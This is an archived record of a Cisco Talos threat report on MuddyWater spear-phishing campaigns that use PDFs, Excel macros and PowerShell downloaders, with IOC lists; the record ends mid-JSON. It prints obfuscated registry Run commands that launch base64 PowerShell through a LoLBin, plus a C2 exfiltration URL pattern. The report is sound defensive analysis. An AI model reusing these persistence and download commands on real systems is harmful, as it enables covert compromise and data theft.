{ "id": "aad86a92-f635-46d5-81d9-62f93d1fe60d", "created_at": "2026-04-06T00:11:28.173598Z", "updated_at": "2026-04-10T03:34:22.475575Z", "deleted_at": null, "sha1_hash": "e699b65ac7f5c9c09cc5b9bada429369da92fb0e", "title": "Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1856642, "plain_text": "Iranian APT MuddyWater targets Turkish users via malicious PDFs,\r\nexecutables\r\nBy Asheer Malhotra\r\nPublished: 2022-01-31 · Archived: 2026-04-02 12:27:20 UTC\r\nCisco Talos has observed a new campaign targeting Turkish private organizations  alongside governmental\r\ninstitutions.\r\nTalos attributes this campaign with high confidence to MuddyWater — an APT group recently attributed to\r\nIran's Ministry of Intelligence and Security (MOIS) by the U.S. Cyber Command.\r\nThis campaign utilizes malicious PDFs, XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds into the target's enterprise. MuddyWater's use of script based\r\ncomponents such as obfuscated PowerShell based downloaders is also a tactic described in the advisory from\r\nJanuary 2021 by the U.S. Cyber Command.\r\nThis campaign also utilizes canary tokens to track successful infection of targets, a new addition to this\r\ngroup's arsenal of tactics, techniques and procedures (TTPs).\r\nThis specific method of taking advantage of canary tokens in this campaign may also be a measure to evade\r\nsandbox based detection systems.\r\nA highly motivated threat actor such as MuddyWater can use unauthorized access to conduct espionage,\r\nintellectual property theft and deploy ransomware and destructive malware in an enterprise.\r\nExecutive summary\r\nMuddyWater has conducted various campaigns against entities spread throughout the U.S.A, Europe, Middle East\r\nand South Asia.\r\nA typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like\r\nPowerShell and Visual Basic coupled with the frequent use of living-off-the-land binaries (LoLBins).\r\nCisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign\r\nconsists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection\r\nvector. These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health\r\nand Interior Ministries.\r\nNext, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and\r\ninstrumentors for additional payloads.\r\nWe've also discovered the use of flags or tokens in attacks conducted by this threat actor in this campaign. These\r\ntokens are meant to signal a successful infection of a target by the group's malicious artifacts.\r\nMuddyWater threat actor\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 1 of 20\n\nMuddyWater, also known as MERCURY or Static Kitten, is an APT group recently attributed to Iran's Ministry of\r\nIntelligence and Security (MOIS) by U.S. Cyber Command. This threat actor, active since at least 2017, frequently\r\nconducts campaigns against high-value targets in American, European and Asian countries. Campaigns carried out by\r\nthe threat actor aim to achieve either of three outcomes:\r\nEspionage  - Supporting the political dominance of the nation state in the Middle East. This is business as\r\nusual for the threat actor, motivated by nation-state interests.\r\nIntellectual property theft - Enables economic advantages to the nation state. This goal is accomplished by\r\ncarrying out aggressive campaigns against private entities and government affiliated institutions such as\r\nuniversities and research entities.\r\nRansomware attacks - MuddyWater has previously attempted to deploy ransomware such as Thanos on victim\r\nnetworks to either destroy evidence of their intrusions or disrupt operations of private organizations.\r\nThis group frequently relies on the use of DNS as part of their means to contact the command and control (C2), while\r\nthe initial contact with hosting servers is done via HTTP. Their initial payloads usually use PowerShell and Visual\r\nBasic scripting along with LoLBins to assist in the initial stages of the infection.\r\nCampaign targeting Turkey\r\nTalos recently observed a campaign operating as recently as November 2021, which we attribute with high\r\nconfidence to the MuddyWater group, targeting Turkish government entities, including the Scientific And\r\nTechnological Research Council of Turkey — Tubitak. This campaign consisted of the use of malicious excel\r\ndocuments (XLS maldocs) and executables stored on a file hosting domain \" snapfile[.]org \", which would be\r\ndelivered to the victims in the form of PDF documents with embedded links.\r\nThese maldocs, hosted on attacker-controlled or public media-sharing websites are downloaded by malicious PDFs\r\nmeant to trick the targets into downloading and opening the maldocs. Based on historic evidence of similar\r\ncampaigns conducted by MuddyWater, it is highly likely that these PDFs served as the initial entry points to the\r\nattacks and were distributed via email messages as part of spear-phishing efforts conducted by the group.\r\nMalicious Excel sheets analyses\r\nTalos identified a set of malicious Microsoft Excel spreadsheet files distributed with Turkish language names. Some\r\nof these files were named to masquerade as legitimate documents from the Turkish Health and Interior Ministries.\r\nAnother file discovered was called \"Teklif_form_onaylı.xls,\" which can be translated to \"Offer_form_approved.xls\"\r\nfrom Turkish. Analysis of the maldocs deployed in this campaign demonstrates a clear evolution of their\r\nimplementation culminating into versions that are fully obfuscated.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 2 of 20\n\nThe documents have some subtle changes — almost like different versions — were being tested. Older documents\r\nhad some information in the document's metadata, such as the title field \" Sayyid \"' and author name \" Aurelia \".\r\nThese initial versions also consisted of an un-obfuscated PowerShell payload in the document's comments fields.\r\nSubsequent iterations of the maldocs saw progressive obfuscation of various malicious code blocks.\r\nNow, the maldocs consist of malicious VBA macros meant to instrument the infection chain. Overall, the macro\r\ncontained in all the maldocs accomplished the same set of functionalities without any major evolutions as described\r\nbelow.\r\nPersistence\r\nThe infection chain instrumented by the VBA macros consist of creating three key artifacts on the infected endpoint:\r\nRegistry key for persistence.\r\nMalicious VB script intermediate component that the macro sets up for persistence.\r\nMalicious PowerShell-based downloader script: The actual post-infection, payload instrumentor used for\r\nexecuting arbitrary code on the infected endpoint.\r\nThe VB script's persistence is set up by creating a malicious Registry Run for the infected user:\r\nHKCU\\Software\\Microsoft\\windows\\CurrentVersion\\Run | \u003crandom\u003e\r\nThis campaign relies on the use of a LoLBin to execute the malicious VBScript.\r\nIn some instances, the attackers make use of a LoLBin DLL called pcwutl.dll, which is part of the operating system,\r\nto execute the VBScript on reboot or re-login. Although the usage of LoLBins is fairly common as a means of lateral\r\nmovement, it is not commonly used to execute the malicious payload.\r\nTracking tokens\r\nAs the maldocs were evolving, some of the metadata details were removed or generalized, and eventually, the latest\r\nversions consisted of obfuscated PowerShell payloads residing in the comments field.\r\nThe malicious VBA macros consisted of the same set of functionalities for creating the malicious VBS and PS1\r\nscripts, and achieving persistence across reboots. However, there was one interesting addition to the macro\r\nfunctionality now. The latest versions of the VBA code deployed could make HTTP requests to a canary token from\r\ncanarytokens.com.\r\nCanary tokens are tokens that can be embedded in objects like documents, web pages and emails. When that object is\r\nopened, an HTTP request to canarytokens.com is generated, alerting the token's owner that the object was opened.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 3 of 20\n\nThe canary token is typically silently executed twice during the execution of the macro. In cooperation with\r\nCanarytokens.com, a list of other tokens created by the same user was added to the IOC section below.\r\nAn attacker may use such tokens to serve one or more purposes such as:\r\nTracking Tokens: A way of tracking who is detonating the malicious code, keeping track of successful\r\ninfections.\r\nTracking tokens can be an anti-analysis method. In this campaign, the server that hosts the final payload may\r\nonly deliver if it first receives two almost simultaneous requests to the token. This would thwart researchers\r\nthat solely request the payload from the server without registering with the canary tokens using an HTTP\r\nrequest.\r\nTracking tokens may also be used as another means of anti-analysis: timing checks. The infection chain\r\nconsists of a PS1-based downloader and two sets of HTTP requests for the canary tokens. A reasonable timing\r\ncheck on the duration between the token requests and the request to download a payload can indicate\r\nautomated analysis. Automated sandboxed systems would typically execute the malicious macro generating\r\nthe token requests. A sandbox would also identify the creation of the registry Run key and re-login the infected\r\nuser to execute the malicious PS1 that generates the request to download the next payload. Typically, since\r\nsandbox-based analysis systems spin up analysis environments for a limited number of minutes, the token\r\nrequests and payload requests wouldn't be too far apart from each other temporally. A substantially low\r\ninterval between the HTTP token requests and PS1 requesting the payload may indicate automated analysis of\r\nthe maldocs and can be used to block payload requests from the infected endpoint.\r\nTracking tokens can also be a method to detect the blocking of the payload server. If they keep receiving\r\nrequests to the token but not to the payload server, that is an indication of their payload server being blocked,\r\nand by whom.\r\nIntermediate VB Script component (VBS)\r\nThe VBS file is a straightforward executor of the PowerShell script dropped by the macro to disk.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 4 of 20\n\nVBS executing the PS1 on the endpoint.\r\nMalicious PowerShell-based downloader\r\nThe PowerShell script deployed in the attack is meant to download and execute the next payload (also a PS1 script)\r\non the infected endpoint. This PS1 script resides in the metadata of the maldoc and is dropped by the macro.\r\nPrimitive versions of the maldocs consisted of unobfuscated versions of the PS1 script, with obfuscations being\r\nintroduced in newer versions.\r\nPS1 downloader script.\r\nThe PowerShell script that downloads another PowerShell from a remote location which will then be executed. It\r\ntries twice, with a custom timeout of 40 seconds and a custom user agent, which is appended with the character \"|\"\r\nseparator and the username executing the script. In other versions of script, the \"|\" character is not appended.\r\nThe fact that the downloader script attempts the download of the payload twice with a big timeout further indicates\r\nthat the canarytokens serve the purpose of anti-analysis. That is, the C2 may need more time to check if the\r\ncanarytokens have been accessed before it delivers the final payload. We could not obtain the final payload, but our\r\ntests indicate that there was some kind of verification process being performed prior to the delivery of the payload.\r\nInfection chain\r\nThe delivery mechanism for this campaign is the distribution of PDF files containing embedded links. Talos found at\r\nleast two PDF files which shared the same author name, \"nejla\" , in the metadata. The PDF files typically show an\r\nerror message and ask the user to click on a link to resolve the issue and display the correct format/extension of the\r\ndocument.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 5 of 20\n\nOnce the victim clicks on the download button, the endpoint receives a second stage, which can be either a malicious\r\nXLS file or a Windows executable that proceeds with the infection as described earlier.\r\nThe maldoc-based infection chain is as follows:\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 6 of 20\n\nMalicious executables-based infection chain\r\nThe initial delivery mechanism of the infection chains consists of the malicious PDF files as the first stage. The URLs\r\ncorresponding to the download button in the PDF files will typically host the malicious XLS files containing the\r\nmacros that deploy the subsequent VBS and PS1 scripts.\r\nWe have, however, recently observed a variation of this infection chain. This second variation consists of the PDF\r\npointing to a URL that delivers a Windows executable (EXE) in the infection chain instead of the malicious XLS\r\nfiles.\r\nThe EXEs are meant to instrument a similar infection chain consisting of the intermediate VBS and final PS1-based\r\ndownloaders.\r\nTurkey\r\nThe EXEs typically use a Turkish name indicating that they can either be delivered via the malicious PDFs or\r\ndistributed independently. One example of an executable was named \"Surec_No_cc2021-pdf377811f-66ad-4397-\r\nbd35-3247101e2fda-eta332018.exe\" which can be translated from Turkish as \"Period_No_\u003c...\u003e32018.exe.\"\r\nOnce executed, the sample drops a text file in the victim's temporary folder. This is actually a decoy PDF or Office\r\ndocument in hex format. During execution, the hex representation of the decoy document is hexlified to create a\r\nreadable copy in the %temp% folder. The decoy will then be opened by the system PDF or document reader and\r\ndisplayed to the victim.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 7 of 20\n\nOnce the decoy document has been displayed to the victim, the executable starts its main malicious task:\r\nDownloading and executing malicious PowerShell scripts served to it by a remote location. Here, we see that the\r\nintermediate VBS scripts used in the maldoc based infection chain have been replaced with a PowerShell-based\r\nimplementation.\r\nThe implant will first create a directory in the user's home folder. This directory will be used to store two PowerShell\r\nscripts:\r\nInstrumentor script used to activate the next stage from disk called \".CloudCache.conf.\"\r\nDownloader script used to download the next stage from a remote location for execution on the endpoint\r\ncalled \".CloudDrive.conf.\"\r\nJust like maldoc-based infections, a registry key is created at\r\nHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN | \u003cSome Application Name\u003e for\r\npersistence.\r\nFor example:\r\nHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN | CloudDrive.\r\nThe registry Run key takes advantage of lolbins to run the payload. In this case, it uses\r\nSyncAppvPublishingServer.vbs to execute PowerShell code, which will execute the code stored in the instrumentor\r\nscript (\".CloudCache.conf\"):\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 8 of 20\n\n\"CloudDrive\"=\"C:\\\\Windows\\\\System32\\\\SyncAppvPublishingServer.vbs \\\"n;.('{2}{0}{1}' -f[string][char][int]101,\r\n[string][char][int]88,'i')((.('{2}{0}{1}' -f[string][char][int]101,[string][char][int]88,'i')((Get-content\r\n$env:USERPROFILE\\\\.CloudDrive\\\\.CloudCache.conf))))\\\"\"\r\nThe instrumentor script is responsible for base64 decoding the contents of the downloader (the second PS1 script)\r\nand executing it on the endpoint.\r\nContents of the instrumentor PS1 .CloudCache.ps1.\r\nThe second PS1 script is the actual downloader of the next stage of PowerShell code that is run on the infected\r\nendpoint. It downloads the next stage of PowerShell code from a remote location and executes it on the infected\r\nendpoint.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 9 of 20\n\nDownloader script.\r\nUnfortunately, there was no way for us to download the final payload.\r\nPakistan\r\nAnother version of the executable deployed by the attacker in August 2021 targeted Pakistani entities. We are unsure\r\nat this time whether the November 2021 targeting of Turkish users is a continuation of this Pakistan-related activity.\r\nThis executable again consists of a decoy document presented to the victim followed by the instrumentation of a\r\nPowerShell-based downloader script.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 10 of 20\n\nThis executable also uses the Registry run key for persistence of its artifacts on the system. However, in this case, we\r\nsaw a variation in the infection chain:\r\nThe attackers skipped using the instrumentor PS1 script as seen in the latest infection chain (described above).\r\nInstead, the attackers configured the Registry run key to execute the downloader script directly via\r\nSyncAppvPublishingServer.vbs.\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n\"OwnDrive\"=\"C:\\\\Windows\\\\System32\\\\SyncAppvPublishingServer.vbs \\\"n;.('{2}{0}{1}' -f[string][char][int]101,\r\n[string][char][int]88,'i')([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-content\r\n$env:USERPROFILE\\\\.VirtualBoxer\\\\.VirtualBoxer.conf))))\\\"\"\r\nThe downloader script used in this instance consists of capabilities to collect preliminary data, such as the computer\r\nname, to register the infection with the C2 server.\r\nThe script will then reach out to the C2 for requesting PowerShell commands to execute. The response received is\r\nparsed by the implant to check if the computer name sent back by the C2 matches the current computer name. If a\r\nmatch is found, the corresponding PowerShell commands issued by the C2 are executed on the endpoint and the\r\noutput/response is AES encrypted and returned to the C2.\r\nThe URL for returning the output of a command executed on the system is:\r\nhttp://\u003cC2_IP\u003e/images?guid=\u003cbase64_encoded + AES encrypted output\u003e\r\nThe User Agent used for all these communications is: Googlebot/2.1 (+http://www.google.com/bot.html)\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 11 of 20\n\nPS1-based downloader script.\r\nTracking Tokens\r\nWe observed the decoy documents reaching out to a remote location:\r\nhxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/Pan-op/gallery.jpg\r\nSimilar URLs on this server were accessed in previously observed MuddyWater campaigns targeting Pakistan.\r\nIt is highly likely that the attackers used this server as a token tracker to monitor successful infections in this\r\ncampaign. This token tracking system was then later migrated to CanaryTokens in September 2021 in the attacks\r\ntargeting Turkey using the malicious Excel documents (illustrated earlier).\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 12 of 20\n\nArmenia\r\nAnother example of a similar executable used by the threat actor in June 2021 was one to target the\r\ntelecommunications sector in Armenia. The decoy document displayed to the victim in this case consists of an\r\ninternal guide (Maintenance Operation Protocol (MOP)) for Armenia's Viva-MTS telecom solution provider from\r\nEricsson pertaining to their Smart Services Routers (SSRs) and Evolved Packet Gateway (EPG).\r\nDecoy document used while targeting Telecom entities.\r\nWhat's interesting is that the decoy document was created on June 6, 2021 and modified on June 8. The malicious\r\nexecutable carrying this decoy was generated a day later on June 9, thus, it is likely that either the attackers created\r\nthe draft of the decoy themselves or had immediate access to their victims that enabled them to exfiltrate documents\r\nthat were then used as decoys and lures to proliferate their campaigns to similar targets of interest.\r\nThe entire infection chain employed in this campaign, using the malicious PowerShell based downloader, was later\r\nseen again in the attack targeting Pakistani entities in August 2021.\r\nThe EXE-based infection chain is as follows:\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 13 of 20\n\nAttribution\r\nTalos assesses with high confidence that these campaigns are the work of the Iranian state-sponsored threat actor\r\nMuddyWater. This assessment is based on both technical indicators and the tactics, techniques, and procedures\r\n(TTPs) employed by the threat actor. The infection chains used in the campaigns illustrated in this research bear a\r\nclose resemblance to those described in Secureworks' report from 2020. We also have a high-fidelity IOC from a\r\ntrusted source that was used in a key part of the infection chains. This IOC has also been used in previous\r\nMuddyWater campaigns.\r\nWhile we cannot disclose additional details at this time due to intelligence sharing sensitivities, we assess that this\r\nparticular finding is significant enough to justify a high-confidence assessment on attribution.\r\nThe malicious XLS lures and the executables used in this campaign deploy two malicious files - a loader and a\r\ndownloader that retrieve the final payloads using a hardcoded URL pointing to a specific hardcoded IP address.\r\nSecureworks' report shows the same technique, albeit based on a batch file and a PowerShell script, while the\r\ncampaign targeting Turkish entities use either a VBS or PS1 script activated via a simple registry entry. In both cases,\r\nthe key PowerShell script's only objective is to download malicious payloads from the C2.\r\nCode and metadata similarities in the maldocs and accompanying scripts utilized in this campaign bear a high degree\r\nof resemblance to previously discovered MuddyWater artifacts.\r\n(A high-fidelity YARA rule for tracking artifacts related to this campaign and previously discovered MuddyWater\r\nartifacts is APT_MuddyWater_MalDoc_Feb20_1, authored by Florian Roth.)\r\nOne of the C2 IP addresses used by the malicious PowerShell downloaders deployed in this campaign,\r\n185[.]118[.]167[.]120, is also listed in a Turkish threat advisory dated September 2021.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 14 of 20\n\nEnglish translation of a threat advisory from Trakya.\r\nThis advisory from the Trakya University in Turkey and a USOM (Turkey National Cyber Incident Response Center)\r\nannouncement contains an alert to an APT-level attack. The initial attack vector is the email service, with emails sent\r\nfrom the following attacker-owned accounts:\r\nsisterdoreencontreve@gmail[.]com\r\nlillianwnwindrope@gmail[.]com\r\ndoctor.x.2020@gmail[.]com\r\nubuntoubunto1398@gmail[.]com\r\na.sara.1995a@gmail[.]com\r\nThis advisory lists C2 IP addresses that have also been observed in the this campaign:\r\n185[.]118[.]167[.]120\r\n185[.]118[.]164[.]165\r\n185[.]118[.]164[.]195\r\n185[.]118[.]164[.]213\r\nThe bolded IPs (first three in the list) are used by the PowerShell scripts dropped by the malicious XLS lures to\r\ndownload a payload.\r\nTalos confirmed the usage of the email address doctor.x.2020@gmail[.]com listed in the advisory to this campaign\r\nusing XLS and executables targeting Turkey.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 15 of 20\n\nConclusion\r\nTalos has observed Iranian related groups carry out malicious campaigns all over the world in recent years. 2021 was\r\nalso prolific in cybersecurity incidents targeting Iranian state-run organizations. These events were attributed to\r\nWestern nations by the Iranian regime, with the promise of revenge. It's hard to say if these campaigns are the result\r\nof such promises or just part of MuddyWater's usual activity.\r\nHowever, the fact that the threat actors have changed some of their methods of operation and tools is another sign of\r\ntheir adaptability and unwillingness to refrain themselves from attacking other nations. In this post we have shown\r\nthe same group running two different campaigns using different tools while targeting the same country, in this case\r\nTurkey, showing their capacity and motivation to compromise their targets and perform their espionage activities.\r\nIn-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention. However,\r\nthis should always be complemented by a good incident response plan which has been not only tested with table top\r\nexercises and reviewed and improved every time it's put to the test on real engagements.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 16 of 20\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these\r\nattacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 17 of 20\n\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and\r\ntests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available\r\nfor purchase on Snort.org.\r\nSnort SIDs for this threat are: 58929-58938.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are\r\ninfected with this specific threat. For specific OSqueries on this threat, click below:\r\nPowershell scripts\r\nVB Scripts\r\nIOCS\r\nWe would like to thank Canary Tools for their cooperation, support and inputs into this research.\r\nHashes\r\n8d6ed63f2ffa053a683810f5f96c76813cdca2e188f16d549e002b2f63cee001\r\n42aa5a474abc9efd3289833eab9e72a560fee48765b94b605fac469739a515c1\r\nd3ecc4137fc9a6d7418b4780864baf64cf7417d7badf463dff6ea48cd455915b\r\n9991b185c9e9732501e0c2bd841e32a4022f0735a0527150bc8e64ac363d409d\r\nd9de66497ad189d785d7535ab263e92ffad81df20b903c5e1d36859b4ed38b6d\r\n5cdc7dd6162a8c791d50f5b2c5136d7ba3bf417104e6096bd4a2b76ea499a2f4\r\n26ed7e89b3c5058836252e0a8ed9ec6b58f5f82a2e543bc6a97b3fd17ae3e4ec\r\na8701fd6a5eb45e044f8bf150793f4189473dde46e0af8314652f6bf670c0a34\r\nb726f4dd745891070f2e516d5d4e4f2f1ce0bf3ff685dc3800455383f342e54d\r\nc9931382f844b61a002f83db1ae475953bbab449529be737df1eee8b3065f6eb\r\nfcdd38ff378605c66333429d9df2242fbce25a5f69f4d6d4c11d9613bcb409b0\r\nc13cb1c9277324534075f807a3fcd24d0d3c024197c7437bf65db78f6a987f7a\r\n450302fb71d8e0e30c80f19cfe7fb7801b223754698cac0997eb3a3c8e440a48\r\nb1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 18 of 20\n\n921b4520b75fcd0071944a483d738223b222ba101e70f2950fbfbc22afbdb5d0\r\nd7de68febbbdb72ff820f6554afb464b5c204c434faa6ffe9b4daf6b691d535f\r\n8b9be9e4d18c5fc71cd12dbfd60ea41eb88a07497e96faa2ba20fdc929b32c0b\r\n7dc49601fa6485c3a2cb1d519794bee004fb7fc0f3b37394a1aef6fceefec0c8\r\na69fee382cf86f9e457e0688932cbd00671d0d5218f8043f1ee385278ee19c8c\r\n63e404011aeabb964ce63f467be29d678d0576bddb72124d491ab5565e1044cf\r\n6910ddb58aee9a77e7bb9cadef9e6280a9b5b495edf0b6538cf8bdc1db8b1f4c\r\nd851badfcf3b3a8b4210bdb33948d0d1d918ec6bf0f1f85cbae6bb8feec7cd74\r\naa72f1543d4a4e6ecbfc2da0167f5601c5c692bed73243cf01f616bc4af68afe\r\n8f255a1f2e17828a5b9205d6991e2c85c3320311da28048785262396cbc568c7\r\ncddd5514b7ed3d33ff8eaa16b7b71621ced857755246683e0d28c4650ea744bf\r\nb4d0161ecab5a7847d325c88ce1a4fc2ca2e11fad0b77638b63ae1781c8b5793\r\nf6569039513e261ba9c70640e6eb8f59a0c72471889d3c0eaba51bdebb91d285\r\n28f2198f811bbd09be31ad51bac49ba0be5e46ebf5c617c49305bb7e274b198c\r\n04d6ed9c6d4a37401ad3c586374f169b0aa8d609710bdcf5434d39e0fd4ed9bd\r\n69e3a454c191ee38663112cf5358a54cca1229188087ed18e92bc9c59b014912\r\ndc28b5e878152b5305b8d251019895caa56a7a95a68eccb89a6ecc41da8aadb9\r\nIPs\r\n137.74.131[.]16\r\n185.118.167[.]120\r\n185.118.164[.]165\r\n185.118.164[.]195\r\n185.118.164[.]213\r\n149.202.242[.]84\r\n5.199.133[.]149\r\n88.119.170[.]124\r\n185.118.164[.]165\r\n7.236.212[.]22\r\n172.245.81[.]135\r\n185.141.27[.]211\r\nURLs\r\nhxxp://185.118.167[.]120/\r\nhxxp://137.74.131[.]16:443/\r\nhxxp://185.141.27[.]211:443/\r\nhxxp://149.202.242[.]84:443/\r\nhxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/ef4f0d9af47d737076923cfccfe01ba7/layer.jpg\r\nhxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/Pan-op/gallery.jpg\r\nhxxps://snapfile[.]org/d/c7817a35554e88572b7b\r\nhxxps://snapfile[.]org/d/0c88a47c3160338bbb68\r\nhxxp://snapfile[.]org/756a12c43a0fb8d56fbf\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 19 of 20\n\nhxxps://snapfile[.]org/5bc3985cf17565a97dbd\r\nhxxps://snapfile[.]org/55e1c83e920bb7dc949c\r\nhxxp://canarytokens[.]com/about/d3g23n4gdcrep20q3wzm153xn/index.html\r\nhxxp://canarytokens[.]com/tags/traffic/images/azp6ai8pg5aq0c619ur0qzi6h/\r\nhxxp://canarytokens[.]com/tags/traffic/images/azp6ai8pg5aq0c619ur0qzi6h/post.jsp\r\nOther canary tokens used by MuddyWater:\r\noy80la8r9iyub22nbhb7wvxrk\r\nkbu1xo0s8ktfxrzsn9iuei3e9\r\nazp6ai8pg5aq0c619ur0qzi6h\r\no1txrtd8gn7i9rt159k5baoys\r\nsmnszrsk7gqjplt0j1idwjrcr\r\nagsbmym5re3whgnd5a8kzntai\r\n60ld4guht70xby71u3io4w43n\r\nlmbvetj0iif8dwjgutckpppq3\r\nkc7snpabrp9z0wp1p1klqgkr9\r\n04p62zz698bdzv2fdbgupdm4j\r\nmpei7e608jb22i90z9x8g0gdu\r\nqut1gl1r6ywzgs1ts922sxtqv\r\n09xzzwe761avzxxmyzi85r7hv\r\nnx4fiakqe1gc02hrnlv8fyis4\r\nb90963gx06jykhz61kv534zcm\r\nbruhtg2dtbzk7j1fsttxga85e\r\nd3g23n4gdcrep20q3wzm153xn\r\nxxe2sm2rddhxfto9gjx25fo9c\r\ngikx04xwvf3uu4af8ekrvfeoj\r\nSource: https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "references": [ "https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html" ], "report_names": [ "iranian-apt-muddywater-targets-turkey.html" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, 